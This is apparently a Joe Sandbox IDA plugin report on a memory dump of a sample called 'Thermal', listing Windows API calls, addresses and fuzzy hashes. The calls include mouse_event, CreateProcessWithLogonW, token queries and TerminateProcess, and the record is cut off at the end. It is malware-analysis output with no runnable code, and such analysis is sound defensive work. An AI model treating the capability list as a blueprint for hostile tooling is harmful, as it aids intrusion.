                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 19622a5e4eb09bb331770cee97ece217ef8407e8df16f38a8a7a6bdd769b6f26
                                                      • Instruction ID: 811a58f0e498b776e1e98e9211985862aa3ecf4b65cfc76d772e430022fe4bd6
                                                      • Opcode Fuzzy Hash: 19622a5e4eb09bb331770cee97ece217ef8407e8df16f38a8a7a6bdd769b6f26
                                                      • Instruction Fuzzy Hash: 31414138608184AFDB26CF64C4C9BD57BE1FF0A314F1841A9EA598F6A3C732A855CB51
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,0019550C,?,?,00000000,00000001), ref: 00197796
                                                        • Part of subcall function 0019406C: GetWindowRect.USER32(?,?), ref: 0019407F
                                                      • GetDesktopWindow.USER32 ref: 001977C0
                                                      • GetWindowRect.USER32(00000000), ref: 001977C7
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 001977F9
                                                        • Part of subcall function 001857FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00185877
                                                      • GetCursorPos.USER32(?), ref: 00197825
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00197883
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: aa787bef2e1a710e758659678ab16dbfdf3f641560f8564845194e181ac5f9f9
                                                      • Instruction ID: 7029a65bcd32b5ac9e474d3c853ea038991d4bae4f50610c20d28fb7cfd99754
                                                      • Opcode Fuzzy Hash: aa787bef2e1a710e758659678ab16dbfdf3f641560f8564845194e181ac5f9f9
                                                      • Instruction Fuzzy Hash: 4C31D372508305AFDB21DF14D849F9BB7EAFF88314F000A19F58997191CB30EA49CBA2
                                                      APIs
                                                        • Part of subcall function 00178CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00178CDE
                                                        • Part of subcall function 00178CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00178CE8
                                                        • Part of subcall function 00178CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00178CF7
                                                        • Part of subcall function 00178CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00178CFE
                                                        • Part of subcall function 00178CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00178D14
                                                      • GetLengthSid.ADVAPI32(?,00000000,0017904D), ref: 00179482
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0017948E
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00179495
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 001794AE
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0017904D), ref: 001794C2
                                                      • HeapFree.KERNEL32(00000000), ref: 001794C9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: ffe0576bbf69c903459f3ff685c05d2272c8267852b91573dd62990e6b40de7f
                                                      • Instruction ID: b096cbd03ccf41553f50b39669b59241645c59297ebf555b28d836dc54f85bdc
                                                      • Opcode Fuzzy Hash: ffe0576bbf69c903459f3ff685c05d2272c8267852b91573dd62990e6b40de7f
                                                      • Instruction Fuzzy Hash: 1811AC72501604EFDB169FA8CD09BAF7BB9EB49356F108118E84A97210C7369949CB60
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00179200
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00179207
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00179216
                                                      • CloseHandle.KERNEL32(00000004), ref: 00179221
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00179250
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00179264
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: f7d8a71095b4e7f7ca6a6bb1156e02c1ca61ce77b6dfa6452aaea77283233e93
                                                      • Instruction ID: b3de5dba4eb7f898dfbb9d34a0a7a202b814d7a354959715342fa4162fa9df8c
                                                      • Opcode Fuzzy Hash: f7d8a71095b4e7f7ca6a6bb1156e02c1ca61ce77b6dfa6452aaea77283233e93
                                                      • Instruction Fuzzy Hash: 5A11597250124EABDF029F94ED49FDE7BB9EF08354F048154FE09A2160C7729DA4EB60
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0017C34E
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0017C35F
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0017C366
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0017C36E
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0017C385
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0017C397
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: aab1b65de5b082a7f3a9ef5d95462f0822330f489700bd8af52535c06d320a75
                                                      • Instruction ID: 6315c24acd6b034a13db7bfa7e5dc7875fdbf00776120c5ebd48aa64fa776e37
                                                      • Opcode Fuzzy Hash: aab1b65de5b082a7f3a9ef5d95462f0822330f489700bd8af52535c06d320a75
                                                      • Instruction Fuzzy Hash: C3014475E00318BBEF119BA59C49A5FBFB8EB48751F008165FE08A7280D7709D10CFA0
                                                      APIs
                                                        • Part of subcall function 001216CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00121729
                                                        • Part of subcall function 001216CF: SelectObject.GDI32(?,00000000), ref: 00121738
                                                        • Part of subcall function 001216CF: BeginPath.GDI32(?), ref: 0012174F
                                                        • Part of subcall function 001216CF: SelectObject.GDI32(?,00000000), ref: 00121778
                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 001AC57C
                                                      • LineTo.GDI32(00000000,00000003,?), ref: 001AC590
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001AC59E
                                                      • LineTo.GDI32(00000000,00000000,?), ref: 001AC5AE
                                                      • EndPath.GDI32(00000000), ref: 001AC5BE
                                                      • StrokePath.GDI32(00000000), ref: 001AC5CE
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: 1b6142aa5ce565a11562c044eb44dc58767a5ca59497ec252362c5157e78935f
                                                      • Instruction ID: 42f060856d9320bb9e248fb2cae37899d1ce8d7545f9654cf7c3cdea1f3625b8
                                                      • Opcode Fuzzy Hash: 1b6142aa5ce565a11562c044eb44dc58767a5ca59497ec252362c5157e78935f
                                                      • Instruction Fuzzy Hash: 36111E7640414CBFEF129F94DC88FAA7F6DEB08354F048111B9185A560D771AD95DBA0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001407EC
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 001407F4
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001407FF
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0014080A
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00140812
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0014081A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 8f31ad519c48f2885c08edf1f8c6867284aa56234af1aea861bafca8e34ee011
                                                      • Instruction ID: 1324ce775275a578d8b6b3d8ecec4f846969088c4caccddd3d4782d7b5753cf5
                                                      • Opcode Fuzzy Hash: 8f31ad519c48f2885c08edf1f8c6867284aa56234af1aea861bafca8e34ee011
                                                      • Instruction Fuzzy Hash: CC016CB09017597DE3008F5A8C85B53FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001859B4
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001859CA
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 001859D9
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001859E8
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001859F2
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001859F9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: b566e0f406fe27c4cb0fea5b2fad564f00d90499fd464b24f04423f7a5539407
                                                      • Instruction ID: 38d96acd1edccd4458627281b8f44b460d6c0e48af4573aad247c983d4d1eeb9
                                                      • Opcode Fuzzy Hash: b566e0f406fe27c4cb0fea5b2fad564f00d90499fd464b24f04423f7a5539407
                                                      • Instruction Fuzzy Hash: 59F06D32640158BBE3225B929C0DEEF7B7CEBCAB11F000259FA0091450E7A05A5186B5
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 001877FE
                                                      • EnterCriticalSection.KERNEL32(?,?,0012C2B6,?,?), ref: 0018780F
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,0012C2B6,?,?), ref: 0018781C
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0012C2B6,?,?), ref: 00187829
                                                        • Part of subcall function 001871F0: CloseHandle.KERNEL32(00000000,?,00187836,?,0012C2B6,?,?), ref: 001871FA
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0018783C
                                                      • LeaveCriticalSection.KERNEL32(?,?,0012C2B6,?,?), ref: 00187843
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: 0868a82e1fbd8bdecca6f0312f85f1b21abd7d9313000f8d773dfc03bd666fab
                                                      • Instruction ID: 90ccf2e15a1075f6a7713a061940413e1fa6b9e6167db4778857695385ee2ffe
                                                      • Opcode Fuzzy Hash: 0868a82e1fbd8bdecca6f0312f85f1b21abd7d9313000f8d773dfc03bd666fab
                                                      • Instruction Fuzzy Hash: B0F08C32145212AFD7162B64EC8CAEB7779FF4D742F240665F203A58A0CBB59985CF60
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00179555
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00179561
                                                      • CloseHandle.KERNEL32(?), ref: 0017956A
                                                      • CloseHandle.KERNEL32(?), ref: 00179572
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0017957B
                                                      • HeapFree.KERNEL32(00000000), ref: 00179582
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 3575d664770a2b9ad86d2f72e0f2f23583e9f585fba6bd3be0d4eace04864c0d
                                                      • Instruction ID: 2be2156043f142780d1c90b64a54a32e6fe75f55be196f7869afbdf88631aa58
                                                      • Opcode Fuzzy Hash: 3575d664770a2b9ad86d2f72e0f2f23583e9f585fba6bd3be0d4eace04864c0d
                                                      • Instruction Fuzzy Hash: 23E05276104545BFDA421BE5EC0C95ABB69FB4D722B504721F21591870CB32A4A1DB50
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00198CFD
                                                      • CharUpperBuffW.USER32(?,?), ref: 00198E0C
                                                      • VariantClear.OLEAUT32(?), ref: 00198F84
                                                        • Part of subcall function 00187B1D: VariantInit.OLEAUT32(00000000), ref: 00187B5D
                                                        • Part of subcall function 00187B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00187B66
                                                        • Part of subcall function 00187B1D: VariantClear.OLEAUT32(00000000), ref: 00187B72
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: 4d1605d2720531d8f62bd1cc456169370e2e145886a56ab059ca7e99fb2e7861
                                                      • Instruction ID: 82319bb23b1e72bc6b405109e837f0d46a9350131b5fac61f3b226e1edb2cac8
                                                      • Opcode Fuzzy Hash: 4d1605d2720531d8f62bd1cc456169370e2e145886a56ab059ca7e99fb2e7861
                                                      • Instruction Fuzzy Hash: 06917D756083019FCB14DF24C48095BBBF5EF9A754F14896EF88A8B3A1DB30E945CB92
                                                      APIs
                                                        • Part of subcall function 0013436A: _wcscpy.LIBCMT ref: 0013438D
                                                      • _memset.LIBCMT ref: 0018332E
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0018335D
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00183410
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0018343E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: 854911f49e80bbc66cff2d71c428f06325f229233327edd77d4b3e4f6eb656bc
                                                      • Instruction ID: 6d8d2de7a12aac3b53d0484e448183069ec44e890ca8f70ee93a984c399b2a86
                                                      • Opcode Fuzzy Hash: 854911f49e80bbc66cff2d71c428f06325f229233327edd77d4b3e4f6eb656bc
                                                      • Instruction Fuzzy Hash: FC51AE316083019BD726AF28D845A6BB7E8AF55B20F080A2DF8A5D31E1DB70DF44CF52
                                                      APIs
                                                      • _memset.LIBCMT ref: 00182F67
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00182F83
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00182FC9
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001E7890,00000000), ref: 00183012
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: 9de79fefe37535a6cc57947df539e541b1093f2eb0c7917c0285b59aa9f898d1
                                                      • Instruction ID: dba93de1824fda8770e86d34d90f3bd64fbf820ebecf04f80f4a7f9d0198b24b
                                                      • Opcode Fuzzy Hash: 9de79fefe37535a6cc57947df539e541b1093f2eb0c7917c0285b59aa9f898d1
                                                      • Instruction Fuzzy Hash: 6F41AF312043419FD725EF24C884F5BBBE8AF98714F144A2EF9A597291DB70EA05CF62
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00179ACC
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00179ADF
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00179B0F
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      • Opcode ID: 91ee4c862c0a07182ee2649dd14f37868f1095f2d10de9eb9853e0d55687572a
                                                      • Instruction ID: 893adb32c946eeac7c1d7900b9e60f994479ae189f19a3aaa26893f306ae3560
                                                      • Opcode Fuzzy Hash: 91ee4c862c0a07182ee2649dd14f37868f1095f2d10de9eb9853e0d55687572a
                                                      • Instruction Fuzzy Hash: F921F371901104BEDB18EBA0DC86DFFB778DF65360F10821AF829972E1DB3449499660
                                                      APIs
                                                        • Part of subcall function 00122111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0012214F
                                                        • Part of subcall function 00122111: GetStockObject.GDI32(00000011), ref: 00122163
                                                        • Part of subcall function 00122111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012216D
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001A6A86
                                                      • LoadLibraryW.KERNEL32(?), ref: 001A6A8D
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001A6AA2
                                                      • DestroyWindow.USER32(?), ref: 001A6AAA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: 5d922862ff67eae1dc6b1ccc24563a45ff657745e46c4078b93ec12b4ece5263
                                                      • Instruction ID: 69a521a4e818c73eb7c8c203f4a508e879294f8145d2beb415802a55c508cda7
                                                      • Opcode Fuzzy Hash: 5d922862ff67eae1dc6b1ccc24563a45ff657745e46c4078b93ec12b4ece5263
                                                      • Instruction Fuzzy Hash: 9321C079200205AFEF108FA4DC80EBB77ADEF5A364F188A19FA51A31D0D371DC919760
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00187377
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001873AA
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 001873BC
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001873F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
